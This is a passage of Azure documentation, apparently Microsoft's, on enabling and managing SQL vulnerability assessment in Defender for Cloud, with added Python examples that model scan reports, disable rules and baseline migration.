  Classic configuration: Azure SQL Database; Azure SQL Managed Instance; Azure Synapse Analytics

Parameter: Supported Policy Scope
  Express configuration: Subscription; Server
  Classic configuration: Subscription; Server; Database

Parameter: Dependencies
  Express configuration: None
  Classic configuration: Azure storage account

Parameter: Recurring scan
  Express configuration: Always active; scan scheduling is internal and not configurable
  Classic configuration: Configurable on/off; scan scheduling is internal and not configurable

Parameter: Supported Rules
  Express configuration: All vulnerability assessment rules for the supported resource type
  Classic configuration: All vulnerability assessment rules for the supported resource type

Parameter: Baseline Settings
  Express configuration: Batch (several rules in one command); Set by latest scan results; Single rule
  Classic configuration: Single rule

Parameter: Apply baseline
  Express configuration: Will take effect without rescanning the database
  Classic configuration: Will take effect only after rescanning the database

Parameter: Single rule scan result size
  Express configuration: Maximum of 1 MB
  Classic configuration: Unlimited

Parameter: Email notifications
  Express configuration: Logic Apps
  Classic configuration: Internal scheduler; Logic Apps

Parameter: Scan export
  Express configuration: Azure Resource Graph
  Classic configuration: Excel format, Azure Resource Graph

Parameter: Supported Clouds
  Express configuration: Commercial clouds; Azure Government; Microsoft Azure operated by 21Vianet
  Classic configuration: Commercial clouds; Azure Government; Azure operated by 21Vianet


Next steps

- Enable SQL vulnerability assessments.
- Express configuration common questions and troubleshooting.
- Learn more about Microsoft Defender for Azure SQL.
- Learn more about data discovery and classification.
- Learn more about storing vulnerability assessment scan results in a storage account accessible behind firewalls and VNets.


Enable vulnerability assessment on your Azure SQL databases

In this article, you'll learn how to enable vulnerability assessment so you can find and remediate database vulnerabilities. We recommend that you enable vulnerability assessment using the express configuration so you aren't dependent on a storage account. You can also enable vulnerability assessment using the classic configuration.

When you enable the Defender for Azure SQL plan in Defender for Cloud, Defender for Cloud automatically enables Advanced Threat Protection and vulnerability assessment with the express configuration for all Azure SQL databases in the selected subscription.

- If you have Azure SQL databases with vulnerability assessment disabled, you can enable vulnerability assessment in the express or classic configuration.
- If you have Azure SQL databases with vulnerability assessment enabled in the classic configuration, you can enable the express configuration so that assessments don't require a storage account.

Prerequisites

- Make sure that Microsoft Defender for Azure SQL is enabled so that you can run scans on your Azure SQL databases.
- Make sure you read and understand the differences between the express and classic configuration.

Enable vulnerability assessment

When you enable the Defender for Azure SQL plan in Defender for Cloud, Defender for Cloud automatically enables Advanced Threat Protection and vulnerability assessment with the express configuration for all Azure SQL databases in the selected subscription.

You can enable vulnerability assessment in two ways:

- Express configuration
- Classic configuration

Express configuration

To enable vulnerability assessment without a storage account, using the express configuration:

1. Sign in to the Azure portal.
2. Open the specific Azure SQL Database resource.
3. Under the Security heading, select Defender for Cloud.
4. Enable the express configuration of vulnerability assessment:

   - If vulnerability assessment is not configured, select Enable in the notice that prompts you to enable the vulnerability assessment express configuration, and confirm the change.

     [Screenshot: Defender for Cloud pane showing "Enablement Status: Enabled at the subscription-level (Configure)" and the notice "SQL Vulnerability Assessment is not configured. Click to enable express configuration. Learn more".]

     You can also select Configure and then select Enable in the Microsoft Defender for SQL settings:

     [Screenshot: Vulnerability Assessment Settings with the notice "SQL Vulnerability Assessment is not configured. Click to enable with SQL Vulnerability Assessment express configuration. Express configuration will be saved as the default for when you turn off Defender for SQL on this server and then turn it back on. Learn more".]

     Select Enable to use the vulnerability assessment express configuration.

   - If vulnerability assessment is already configured, select Enable in the notice that prompts you to switch to express configuration, and confirm the change.

     Important: Baselines and scan history are not migrated.

     [Screenshot: Defender for Cloud pane showing "Enablement Status: Enabled at the subscription-level (Configure)" and the notice "Switch to the new express configuration experience for SQL Vulnerability Assessment. Learn more".]

     You can also select Configure and then select Enable in the Microsoft Defender for SQL settings:

     [Screenshot: Vulnerability Assessment Settings with the notice "Switch to the new express configuration experience for SQL Vulnerability Assessment. Express configuration will be saved as the default for when you turn off Defender for SQL on this server and then turn it back on. Learn more".]

Now you can go to the SQL databases should have vulnerability findings resolved recommendation to see the vulnerabilities found in your databases. You can also run on-demand vulnerability assessment scans to see the current findings.

Note: Each database is randomly assigned a scan time on a set day of the week.
Enable express vulnerability assessment at scale

If you have SQL resources that don't have Advanced Threat Protection and vulnerability assessment enabled, you can use the SQL vulnerability assessment APIs to enable SQL vulnerability assessment with the express configuration at scale.

Classic configuration

To enable vulnerability assessment with a storage account, use the classic configuration:


1. In the Azure portal, open the specific resource in Azure SQL Database, SQL Managed Instance Database, or Azure Synapse.
2. Under the Security heading, select Defender for Cloud.
3. Select Configure on the link to open the Microsoft Defender for SQL settings pane for either the entire server or managed instance.

   [Screenshot: the "sql-dev-1 | Microsoft Defender for Cloud" pane of a SQL server, showing "Enablement Status: Enabled at the subscription-level (Configure)" and the notice "Switch to the new express configuration experience for SQL Vulnerability Assessment (preview). Learn more".]
4. In the Server settings page, enter the Microsoft Defender for SQL settings:

   [Screenshot: Server settings pane for Azure Defender for SQL. The pane states that the plan costs 15 USD/server/month, includes Vulnerability Assessment and Advanced Threat Protection, and offers a 30-day trial without charge. Vulnerability Assessment Settings: Subscription, Storage account, Periodic recurring scans (on/off; "Scans will be triggered automatically once a week. In most cases, it will be on the day Vulnerability Assessment has been enabled and saved. A scan result summary will be sent to the email addresses you provide."), Send scan reports to, Also send email notification to admins and subscription owners. Advanced Threat Protection Settings: Send alerts to, Also send email notification to admins and subscription owners, Advanced Threat Protection types (All).]

   a. Configure a storage account where your scan results for all databases on the server or managed instance will be stored. For information about storage accounts, see About Azure storage accounts.

   b. To configure vulnerability assessments to automatically run weekly scans to detect security misconfigurations, set Periodic recurring scans to On. The results are sent to the email addresses you provide in Send scan reports to. You can also send email notification to admins and subscription owners by enabling Also send email notification to admins and subscription owners.

   Note: Each database is randomly assigned a scan time on a set day of the week. Email notifications are scheduled randomly per server on a set day of the week. The email notification report includes data from all recurring database scans that were executed during the preceding week (does not include on-demand scans).

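The reporting rule in the note above (only recurring scans from the preceding week, on-demand scans left out, disabled findings still counted) as an added Python example. This is not Microsoft's code: the scan records, their field names and the "Recurring"/"OnDemand" trigger labels are constructed for the example, and the report shape is an assumption, not the format of the actual email.

```python
"""Weekly vulnerability assessment summary for one SQL server.

Added example (not Microsoft's code). Models the rule the classic
configuration's email report follows: recurring scans that completed in
the preceding week are included, on-demand scans are not, and disabled
("Not applicable") findings are still listed.
"""
from datetime import datetime, timedelta, timezone


def parse_ts(text):
    """Parse an ISO-8601 UTC timestamp such as 2023-07-20T03:15:00Z."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


# Constructed scan records, one per completed scan. 'trigger' models the
# two ways a scan can start; the counts are made up for the example.
SAMPLE_SCANS = [
    {"database": "db01", "trigger": "Recurring", "end": "2023-07-20T03:15:00Z",
     "failed": 3, "passed": 40, "not_applicable": 1},
    {"database": "db01", "trigger": "OnDemand", "end": "2023-07-22T10:00:00Z",
     "failed": 1, "passed": 42, "not_applicable": 1},
    {"database": "db02", "trigger": "Recurring", "end": "2023-07-21T04:00:00Z",
     "failed": 0, "passed": 44, "not_applicable": 0},
    {"database": "db03", "trigger": "Recurring", "end": "2023-07-10T04:00:00Z",
     "failed": 5, "passed": 39, "not_applicable": 0},   # older than a week
]


def weekly_report(scans, report_time, window_days=7):
    """Return {database: summary} built from recurring scans inside the window.

    A database scanned more than once in the window reports its latest
    recurring scan. Databases with no recurring scan in the window are
    omitted rather than reported as clean.
    """
    cutoff = report_time - timedelta(days=window_days)
    latest = {}
    for scan in scans:
        if scan["trigger"] != "Recurring":
            continue  # on-demand scans are not part of the weekly email
        ended = parse_ts(scan["end"])
        if not (cutoff < ended <= report_time):
            continue
        current = latest.get(scan["database"])
        if current is None or ended > parse_ts(current["end"]):
            latest[scan["database"]] = scan
    report = {}
    for db, scan in sorted(latest.items()):
        report[db] = {
            "scanned_at": scan["end"],
            "failed": scan["failed"],
            "passed": scan["passed"],
            "not_applicable": scan["not_applicable"],  # disabled findings stay visible
        }
    return report


def databases_missing(scans, report):
    """Databases that have scan history but no recurring scan in this week's report.

    An absent database is a gap worth checking (the weekly scan may not have
    run), which a report of only the scanned databases would hide.
    """
    known = {s["database"] for s in scans}
    return sorted(known - set(report))


if __name__ == "__main__":
    now = parse_ts("2023-07-24T06:00:00Z")
    rep = weekly_report(SAMPLE_SCANS, now)
    for db, row in rep.items():
        print(db, row)
    print("no recurring scan this week:", databases_missing(SAMPLE_SCANS, rep))
```

The `databases_missing` check is the part worth keeping from this: the email lists what was scanned, so a database whose scheduled scan silently did not run shows up only as an absence.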

Next steps

Learn more about:

- Microsoft Defender for Azure SQL
- Data discovery and classification
- Storing scan results in a storage account behind firewalls and VNets


Manage vulnerability findings in your Azure SQL databases

Microsoft Defender for Cloud provides vulnerability assessment for your Azure SQL databases. Vulnerability assessment scans your databases for software vulnerabilities and provides a list of findings. You can use the findings to remediate software vulnerabilities and disable findings.

Prerequisites

Make sure that you know whether you're using the express or classic configurations before you continue.

To see which configuration you're using:

1. In the Azure portal, open the specific resource in Azure SQL Database, SQL Managed Instance Database, or Azure Synapse.
2. Under the Security heading, select Defender for Cloud.
3. In the Enablement Status, select Configure to open the Microsoft Defender for SQL settings pane for either the entire server or managed instance.

If the vulnerability settings show the option to configure a storage account, you're using the classic configuration. If not, you're using the express configuration.

- Express configuration
- Classic configuration


Express configuration

View scan history

Select Scan History in the vulnerability assessment pane to view a history of all scans previously run on this database.

Express configuration doesn't store scan results if they're identical to previous scans. The scan time shown in the scan history is the time of the last scan where the scan results changed.

Disable specific findings from Microsoft Defender for Cloud (preview)

If you have an organizational need to ignore a finding rather than remediate it, you can disable the finding. Disabled findings don't impact your secure score or generate unwanted noise. You can see the disabled finding in the "Not applicable" section of the scan results.

When a finding matches the criteria you've defined in your disable rules, it won't appear in the list of findings. Typical scenarios may include:

- Disable findings with medium or lower severity
- Disable findings that are non-patchable
- Disable findings from benchmarks that aren't of interest for a defined scope

Important: To disable specific findings, you need permissions to edit a policy in Azure Policy. Learn more in Azure RBAC permissions in Azure Policy.

To create a rule:

1. From the recommendations detail page for Vulnerability assessment findings on your SQL servers on machines should be remediated, select Disable rule.
2. Select the relevant scope.
3. Define your criteria. You can use any of the following criteria:

   - Finding ID
   - Severity
   - Benchmarks

4. Create a disable rule for VA findings on SQL servers on machines.
5. Select Apply rule. Changes might take up to 24 hrs to take effect.
6. To view, override, or delete a rule:
   a. Select Disable rule.
   b. From the scope list, subscriptions with active rules show as Rule applied.
   c. To view or delete the rule, select the ellipsis menu ("...").

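The effect of a disable rule on a set of findings, as an added Python example (not Microsoft's code and not how Defender for Cloud evaluates rules internally). It implements the three criteria the procedure above offers (Finding ID, Severity, Benchmarks) over constructed sample findings and shows what the page describes: a matching finding moves to "Not applicable" and stops counting as a failed finding. Two modelling assumptions: the severity criterion is treated as a ceiling, which is the page's "medium or lower severity" scenario, and only failed checks are findings, so passed checks are never disabled. Rule IDs are ones shown on the page; severities and benchmark names are made up.

```python
"""Model of Defender for Cloud 'disable rules' for SQL vulnerability
assessment findings. Added example, not Microsoft's code."""
from dataclasses import dataclass, field
from typing import Optional, Set

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3}


@dataclass(frozen=True)
class Finding:
    rule_id: str      # VA rule id, e.g. VA1258
    severity: str     # Low / Medium / High
    benchmark: str    # benchmark the check belongs to (constructed names below)
    status: str       # Failed / Passed


@dataclass
class DisableRule:
    """One rule; a finding is disabled when it matches ANY configured criterion."""
    finding_ids: Set[str] = field(default_factory=set)
    severity_at_most: Optional[str] = None   # assumption: "medium or lower" style ceiling
    benchmarks: Set[str] = field(default_factory=set)

    def matches(self, finding: Finding) -> bool:
        if finding.rule_id in self.finding_ids:
            return True
        if (self.severity_at_most is not None and
                SEVERITY_RANK[finding.severity] <= SEVERITY_RANK[self.severity_at_most]):
            return True
        if finding.benchmark in self.benchmarks:
            return True
        return False


def apply_disable_rules(findings, rules):
    """Split findings into (active, not_applicable).

    Only failed checks are findings, so passed checks stay in 'active'
    untouched even if a rule would match their id.
    """
    active, not_applicable = [], []
    for f in findings:
        if f.status == "Failed" and any(r.matches(f) for r in rules):
            not_applicable.append(f)
        else:
            active.append(f)
    return active, not_applicable


def summary(findings, rules):
    """Counts grouped the way the scan results pane groups them."""
    active, not_applicable = apply_disable_rules(findings, rules)
    return {
        "failed": sum(1 for f in active if f.status == "Failed"),
        "passed": sum(1 for f in active if f.status == "Passed"),
        "not_applicable": len(not_applicable),
    }


# Constructed sample data: rule ids appear on the page, everything else is made up.
SAMPLE_FINDINGS = [
    Finding("VA2108", "High", "BenchmarkA", "Failed"),
    Finding("VA2129", "Medium", "BenchmarkA", "Failed"),
    Finding("VA1258", "Low", "BenchmarkA", "Failed"),
    Finding("VA1220", "High", "BenchmarkB", "Failed"),
    Finding("VA1059", "High", "BenchmarkA", "Passed"),
]

SAMPLE_RULES = [
    DisableRule(finding_ids={"VA1258"}),       # an accepted database-owner setup
    DisableRule(severity_at_most="Medium"),    # "medium or lower severity"
]

if __name__ == "__main__":
    print(summary(SAMPLE_FINDINGS, SAMPLE_RULES))
```

A rule that disables by severity or benchmark is broad by construction; before applying one at subscription scope, run the rule through a copy of the current findings as above and check which high-severity checks, if any, it would hide.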
Configure email notifications using Azure Logic Apps

To receive regular updates of the vulnerability assessment status for your database, you can use the customizable Azure Logic Apps template.

Using the template will allow you to:

- Choose the timing of the email reports.
- Have a consistent view of your vulnerability assessment status that includes disabled rules.
- Send reports for Azure SQL Servers and SQL VMs.
- Customize report structure and look-and-feel to match your organizational standards.


Manage vulnerability assessments programmatically

The express configuration is supported in the latest REST API version with the following functionality (description, scope, API):

- Baseline bulk operations, System Database: Sql Vulnerability Assessment Baselines; Sql Vulnerability Assessment Baseline
- Baseline bulk operations, User Database: Database Sql Vulnerability Assessment Baselines
- Single rule baseline operations, User Database: Database Sql Vulnerability Assessment Rule Baselines
- Single rule baseline operations, System Database: Sql Vulnerability Assessment Rule Baselines; Sql Vulnerability Assessment Rule Baseline
- Single scan results, User Database: Database Sql Vulnerability Assessment Scan Result
- Single scan results, System Database: Sql Vulnerability Assessment Scan Result
- Scan details (summary), User Database: Database Sql Vulnerability Assessment Scans
- Scan details (summary), System Database: Sql Vulnerability Assessment Scans
- Execute manual scan, User Database: Database Sql Vulnerability Assessment Execute Scan
- Execute manual scan, System Database: Sql Vulnerability Assessment Execute Scan
- VA settings (GET only is supported for Express Configuration), User Database: Database Sql Vulnerability Assessments Settings
- VA Settings operations, Server: Sql Vulnerability Assessments Settings; Sql Vulnerability Assessments

Using Azure Resource Manager templates

Use the following ARM template to create a new Azure SQL Logical Server with express configuration for SQL vulnerability assessment.

To configure vulnerability assessment baselines by using Azure Resource Manager templates, use the Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines type. Make sure that vulnerabilityAssessments is enabled before you add baselines.

Here are several examples of how you can set up baselines using ARM templates:

- Set up a batch baseline based on the latest scan results:

JSON

{
    "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines",
    "apiVersion": "2022-02-01-preview",
    "name": "[concat(parameters('serverName'),'/', parameters('databaseName') , '/default/default')]",
    "properties": {
        "latestScan": true
    }
}

- Set up a batch baseline based on specific results:

JSON

{
    "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines",
    "apiVersion": "2022-02-01-preview",
    "name": "[concat(parameters('serverName'),'/', parameters('databaseName') , '/default/default')]",
    "properties": {
        "latestScan": false,
        "results": {
            "VA2065": [
                [
                    "FirewallRuleName3",
                    "62.92.15.67",
                    "62.92.15.67"
                ],
                [
                    "FirewallRuleName4",
                    "62.92.15.68",
                    "62.92.15.83"
                ]
            ],
            "VA2130": [
                [
                    "dbo"
                ]
            ]
        }
    }
}

- Set up a baseline for a specific rule:

JSON

{
    "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines/rules",
    "apiVersion": "2022-02-01-preview",
    "name": "[concat(parameters('serverName'),'/', parameters('databaseName') , '/default/default/VA1143')]",
    "properties": {
        "latestScan": false,
        "results": [
            [ "True" ]
        ]
    }
}

- Set up batch baselines on the master database based on the latest scan results:

JSON

{
    "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines",
    "apiVersion": "2022-02-01-preview",
    "name": "[concat(parameters('serverName'),'/master/default/default')]",
    "properties": {
        "latestScan": true
    }
}

Using PowerShell

Express configuration isn't supported in PowerShell cmdlets, but you can use PowerShell to invoke the latest vulnerability assessment capabilities using the REST API, for example:

- Enable express configuration on an Azure SQL Server
- Set up baselines based on the latest scan results for all databases in an Azure SQL Server
- Express configuration PowerShell commands reference

Using Azure CLI

Invoke express configuration using Azure CLI.

Troubleshooting
Troubleshooting 


Revert back to the classic configuration

To change an Azure SQL database from the express vulnerability assessment configuration to the classic configuration:

1. Disable the Defender for Azure SQL plan from the Azure portal.

2. Use PowerShell to reconfigure using the classic experience:

PowerShell

Update-AzSqlServerAdvancedThreatProtectionSetting `
    -ResourceGroupName "demo-rg" `
    -ServerName "dbsrv1" `
    -Enable 1

Update-AzSqlServerVulnerabilityAssessmentSetting `
    -ResourceGroupName "demo-rg" `
    -ServerName "dbsrv1" `
    -StorageAccountName "mystorage" `
    -RecurringScansInterval Weekly `
    -ScanResultsContainerName "vulnerability-assessment"

You may have to tweak Update-AzSqlServerVulnerabilityAssessmentSetting according to Store Vulnerability Assessment scan results in a storage account accessible behind firewalls and VNets.

Errors

"Vulnerability Assessment is enabled on this server or one of its underlying databases with an incompatible version"

Possible causes:

- Switching to express configuration failed due to a server policy error.

  Solution: Try again to enable the express configuration. If the issue persists, try to disable Microsoft Defender for SQL in the Azure SQL resource, select Save, enable Microsoft Defender for SQL again, and select Save.

- Switching to express configuration failed due to a database policy error. Database policies aren't visible in the Azure portal for Defender for SQL vulnerability assessment, so we check for them during the validation stage of switching to express configuration.

  Solution: Disable all database policies for the relevant server and then try to switch to express configuration again. Consider using the provided PowerShell script for assistance.

Classic configuration

View scan history

Select Scan History in the vulnerability assessment pane to view a history of all scans previously run on this database.

Disable specific findings from Microsoft Defender for Cloud (preview)

If you have an organizational need to ignore a finding, rather than remediate it, you can optionally disable it. Disabled findings don't impact your secure score or generate unwanted noise.

When a finding matches the criteria you've defined in your disable rules, it won't appear in the list of findings. Typical scenarios may include:

- Disable findings with medium or lower severity
- Disable findings that are non-patchable
- Disable findings from benchmarks that aren't of interest for a defined scope

Important:

- To disable specific findings, you need permissions to edit a policy in Azure Policy. Learn more in Azure RBAC permissions in Azure Policy.
- Disabled findings will still be included in the weekly SQL vulnerability assessment email report.
- Disabled rules are shown in the "Not applicable" section of the scan results.

To create a rule:

1. From the recommendations detail page for Vulnerability assessment findings on your SQL servers on machines should be remediated, select Disable rule.
2. Select the relevant scope.
3. Define your criteria. You can use any of the following criteria:

   - Finding ID
   - Severity
   - Benchmarks

   [Screenshot: the "Disable rule (Preview)" pane opened from the recommendation "Vulnerability assessment findings on your SQL servers on machines should be remediated". It disables findings that match any of the following criteria: IDs (for example VA1258), Minimum severity, Benchmarks, with an optional Justification. The pane notes that new disable rules applied to a subscription might take up to 30 minutes to take effect, and that disabling a rule on a management group will apply to or override any rules that may exist on underlying subscriptions. The findings list behind it shows checks such as VA2108 "Minimal set of principals should be members of fixed high impact database roles", VA2129 "Changes to signed modules should be authorized", VA1258 "Database owners are as expected", VA2114 "Minimal set of principals should be members of fixed server roles", VA2120 "Features that may affect security should be disabled", VA2110 "Execute permissions to access the registry should be restricted", VA1220 "Database communication using TDS should be protected through TLS", VA1279 "Force encryption should be enabled for TDS", VA1018 "Latest updates should be installed", and VA1059 "xp_cmdshell should be disabled".]

4. Select Apply rule. Changes might take up to 24 hrs to take effect.
5. To view, override, or delete a rule:
   a. Select Disable rule.
   b. From the scope list, subscriptions with active rules show as Rule applied.

   [Screenshot: the "Disable rule" scope list. "You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your secure score." Each item shows its Current status (for example "Rule applied" or "4 of 5 subscriptions") and a More menu with View rule and Delete rule.]

   c. To view or delete the rule, select the ellipsis menu ("...").

Manage vulnerability assessments programmatically

Azure PowerShell

Note: This article uses the Azure Az PowerShell module, which is the recommended PowerShell module for interacting with Azure. To get started with the Az PowerShell module, see Install Azure PowerShell. To learn how to migrate to the Az PowerShell module, see Migrate Azure PowerShell from AzureRM to Az.

Important: The PowerShell Azure Resource Manager module is still supported, but all future development is for the Az.Sql module. For these cmdlets, see AzureRM.Sql. The arguments for the commands in the Az module and in the AzureRm modules are substantially identical.

You can use Azure PowerShell cmdlets to programmatically manage your vulnerability assessments. The supported cmdlets are:

Clear-AzSqlDatabaseVulnerabilityAssessmentRuleBaseline
    Clears the vulnerability assessment rule baseline. First, set the baseline before you use this cmdlet to clear it.

Clear-AzSqlDatabaseVulnerabilityAssessmentSetting
    Clears the vulnerability assessment settings of a database.

Clear-AzSqlInstanceDatabaseVulnerabilityAssessmentRuleBaseline
    Clears the vulnerability assessment rule baseline of a managed database. First, set the baseline before you use this cmdlet to clear it.

Clear-AzSqlInstanceDatabaseVulnerabilityAssessmentSetting
    Clears the vulnerability assessment settings of a managed database.

Clear-AzSqlInstanceVulnerabilityAssessmentSetting
    Clears the vulnerability assessment settings of a managed instance.

Convert-AzSqlDatabaseVulnerabilityAssessmentScan
    Converts vulnerability assessment scan results of a database to an Excel file (export).

Convert-AzSqlInstanceDatabaseVulnerabilityAssessmentScan
    Converts vulnerability assessment scan results of a managed database to an Excel file (export).

Get-AzSqlDatabaseVulnerabilityAssessmentRuleBaseline
    Gets the vulnerability assessment rule baseline of a database for a given rule.

Get-AzSqlInstanceDatabaseVulnerabilityAssessmentRuleBaseline
    Gets the vulnerability assessment rule baseline of a managed database for a given rule.

Get-AzSqlDatabaseVulnerabilityAssessmentScanRecord
    Gets all vulnerability assessment scan records associated with a given database.

Get-AzSqlInstanceDatabaseVulnerabilityAssessmentScanRecord
    Gets all vulnerability assessment scan records associated with a given managed database.

Get-AzSqlDatabaseVulnerabilityAssessmentSetting
    Returns the vulnerability assessment settings of a database.

Get-AzSqlInstanceDatabaseVulnerabilityAssessmentSetting
    Returns the vulnerability assessment settings of a managed database.

Set-AzSqlDatabaseVulnerabilityAssessmentRuleBaseline
    Sets the vulnerability assessment rule baseline.

Set-AzSqlInstanceDatabaseVulnerabilityAssessmentRuleBaseline
    Sets the vulnerability assessment rule baseline for a managed database.

Start-AzSqlDatabaseVulnerabilityAssessmentScan
    Triggers the start of a vulnerability assessment scan on a database.

Start-AzSqlInstanceDatabaseVulnerabilityAssessmentScan
    Triggers the start of a vulnerability assessment scan on a managed database.

Update-AzSqlDatabaseVulnerabilityAssessmentSetting
    Updates the vulnerability assessment settings of a database.

Update-AzSqlInstanceDatabaseVulnerabilityAssessmentSetting
    Updates the vulnerability assessment settings of a managed database.

Update-AzSqlInstanceVulnerabilityAssessmentSetting
    Updates the vulnerability assessment settings of a managed instance.

For a script example, see Azure SQL vulnerability assessment PowerShell support.


Azure CLI

Important: The following Azure CLI commands are for SQL databases hosted on VMs or on-premises machines. For vulnerability assessments regarding Azure SQL Databases, refer to the Azure portal or PowerShell section.

You can use Azure CLI commands to programmatically manage your vulnerability assessments. The supported commands are:

az security va sql baseline delete
    Delete SQL vulnerability assessment rule baseline.

az security va sql baseline list
    View SQL vulnerability assessment baseline for all rules.

az security va sql baseline set
    Sets SQL vulnerability assessment baseline. Replaces the current baseline.

az security va sql baseline show
    View SQL vulnerability assessment rule baseline.

az security va sql baseline update
    Update SQL vulnerability assessment rule baseline. Replaces the current rule baseline.

az security va sql results list
    View all SQL vulnerability assessment scan results.

az security va sql results show
    View SQL vulnerability assessment scan results.

az security va sql scans list
    List all SQL vulnerability assessment scan summaries.

az security va sql scans show
    View SQL vulnerability assessment scan summaries.

Resource Manager templates

To configure vulnerability assessment baselines by using Azure Resource Manager templates, use the Microsoft.Sql/servers/databases/vulnerabilityAssessments/rules/baselines type. Ensure that you have enabled vulnerabilityAssessments before you add baselines.

Here's an example for defining Baseline Rule VA2065 to master database and VA1143 to user database as resources in a Resource Manager template:

JSON

"resources": [
    {
        "type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/rules/baselines",
        "apiVersion": "2018-06-01",
        "name": "[concat(parameters('server_name'),'/', parameters('database_name') , '/default/VA2065/master')]",
        "properties": {
            "baselineResults": [
                {
                    "result": [
                        "FirewallRuleName3",
                        "StartIpAddress",
                        "EndIpAddress"
                    ]
                },
                {
                    "result": [
                        "FirewallRuleName4",
                        "62.92.15.68",
                        "62.92.15.83"
                    ]
                }
            ]
        }
    },
    {
        "type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/rules/baselines",
        "apiVersion": "2018-06-01",
        "name": "[concat(parameters('server_name'),'/', parameters('database_name'), '/default/VA2130/Default')]",
        "dependsOn": [
            "[resourceId('Microsoft.Sql/servers/vulnerabilityAssessments', parameters('server_name'), 'Default')]"
        ],
        "properties": {
            "baselineResults": [
                {
                    "result": [
                        "dbo"
                    ]
                }
            ]
        }
    }
]

For master database and user database, the resource names are defined differently:

- Master database - "name": "[concat(parameters('server_name'),'/', parameters('database_name'), '/default/VA2065/master')]",
- User database - "name": "[concat(parameters('server_name'),'/', parameters('database_name'), '/default/VA2065/default')]",

To handle Boolean types as true/false, set the baseline result with binary input like "1"/"0".

JSON

{
    "type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/rules/baselines",
    "apiVersion": "2018-06-01",
    "name": "[concat(parameters('server_name'),'/', parameters('database_name'), '/default/VA1143/Default')]",
    "dependsOn": [
        "[resourceId('Microsoft.Sql/servers/vulnerabilityAssessments', parameters('server_name'), 'Default')]"
    ],
    "properties": {
        "baselineResults": [
            {
                "result": [
                    "1"
                ]
            }
        ]
    }
}

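The two baseline formats on this page, the classic per-rule rules/baselines resource above and the express batch baselines resource from the "Using Azure Resource Manager templates" section, differ in resource type, naming and shape. The following added Python example (not Microsoft's code, and not how the migration script on this page does it) converts resolved classic baseline resources into express batch baseline resources: it groups the per-rule rows under properties.results for one resource per database, and applies the naming difference the page describes, where a trailing "master" segment in the classic name means the server's master database and therefore maps to {server}/master/default/default in the express format. The sample input is constructed from the page's classic example with the ARM concat() expressions already resolved to server "srv01" and database "db01". Result values are copied unchanged; note that the page's express example for VA1143 uses "True" while the classic one uses "1", so check value formats against the target API before deploying the output.

```python
"""Translate classic-configuration SQL VA baseline resources into
express-configuration batch baseline resources. Added example, not
Microsoft's code; sample input is constructed."""
import json
from collections import defaultdict

CLASSIC_TYPE = "Microsoft.Sql/servers/databases/vulnerabilityAssessments/rules/baselines"
EXPRESS_TYPE = "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
EXPRESS_API_VERSION = "2022-02-01-preview"


def parse_classic_name(name):
    """Return (server, target_database, rule_id) from a resolved classic name.

    Resolved classic names look like {server}/{database}/default/{ruleId}/{master|default}.
    """
    parts = name.split("/")
    if len(parts) != 5 or parts[2] != "default" or parts[4].lower() not in ("master", "default"):
        raise ValueError(f"unexpected classic baseline name: {name!r}")
    server, database, _, rule_id, baseline_name = parts
    # A trailing 'master' segment addresses the server's master database even
    # though the path still carries the user database name; in the express
    # format that baseline lives under {server}/master/default/default.
    target = "master" if baseline_name.lower() == "master" else database
    return server, target, rule_id


def to_express(classic_resources):
    """Group per-rule classic baselines into one express batch baseline per database."""
    grouped = defaultdict(dict)
    for res in classic_resources:
        if res.get("type") != CLASSIC_TYPE:
            raise ValueError(f"not a classic baseline resource: {res.get('type')!r}")
        server, database, rule_id = parse_classic_name(res["name"])
        rows = [entry["result"] for entry in res["properties"]["baselineResults"]]
        if rule_id in grouped[(server, database)]:
            raise ValueError(f"duplicate baseline for {rule_id} on {server}/{database}")
        grouped[(server, database)][rule_id] = rows
    express = []
    for (server, database), results in sorted(grouped.items()):
        express.append({
            "type": EXPRESS_TYPE,
            "apiVersion": EXPRESS_API_VERSION,
            "name": f"{server}/{database}/default/default",
            "properties": {
                # Explicit rows rather than latestScan: keep the reviewed values,
                # not whatever the next scan happens to report.
                "latestScan": False,
                "results": results,
            },
        })
    return express


def render(express_resources):
    """Serialize as an ARM 'resources' array fragment."""
    return json.dumps({"resources": express_resources}, indent=2)


# Constructed input: the page's classic example, names resolved for
# server 'srv01' and user database 'db01'.
SAMPLE_CLASSIC = [
    {
        "type": CLASSIC_TYPE, "apiVersion": "2018-06-01",
        "name": "srv01/db01/default/VA2065/master",
        "properties": {"baselineResults": [
            {"result": ["FirewallRuleName3", "StartIpAddress", "EndIpAddress"]},
            {"result": ["FirewallRuleName4", "62.92.15.68", "62.92.15.83"]},
        ]},
    },
    {
        "type": CLASSIC_TYPE, "apiVersion": "2018-06-01",
        "name": "srv01/db01/default/VA2130/Default",
        "properties": {"baselineResults": [{"result": ["dbo"]}]},
    },
    {
        "type": CLASSIC_TYPE, "apiVersion": "2018-06-01",
        "name": "srv01/db01/default/VA1143/Default",
        "properties": {"baselineResults": [{"result": ["1"]}]},
    },
]

if __name__ == "__main__":
    print(render(to_express(SAMPLE_CLASSIC)))
```

The duplicate-rule check matters when classic baselines were deployed from several templates over time: the express resource replaces the whole baseline for a database in one PUT, so two classic definitions for the same rule would otherwise be silently collapsed into whichever came last.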
Next steps

- Learn more about Microsoft Defender for Azure SQL.
- Learn more about data discovery and classification.
- Learn more about storing vulnerability assessment scan results in a storage account accessible behind firewalls and VNets.
- Check out common questions about Azure SQL databases.


Enable vulnerability assessments on Azure SQL databases with the express configuration

Article 07/03/2023

This PowerShell script enables the express configuration of vulnerability assessments on an Azure SQL Server.

If vulnerability assessment has already been configured using the classic configuration, this script migrates it to the express configuration and copies all of the pre-existing baseline definitions. Your scan history isn't copied over to the new configuration. Your scan history remains accessible on the storage account that was previously used by the classic configuration.

Prerequisites

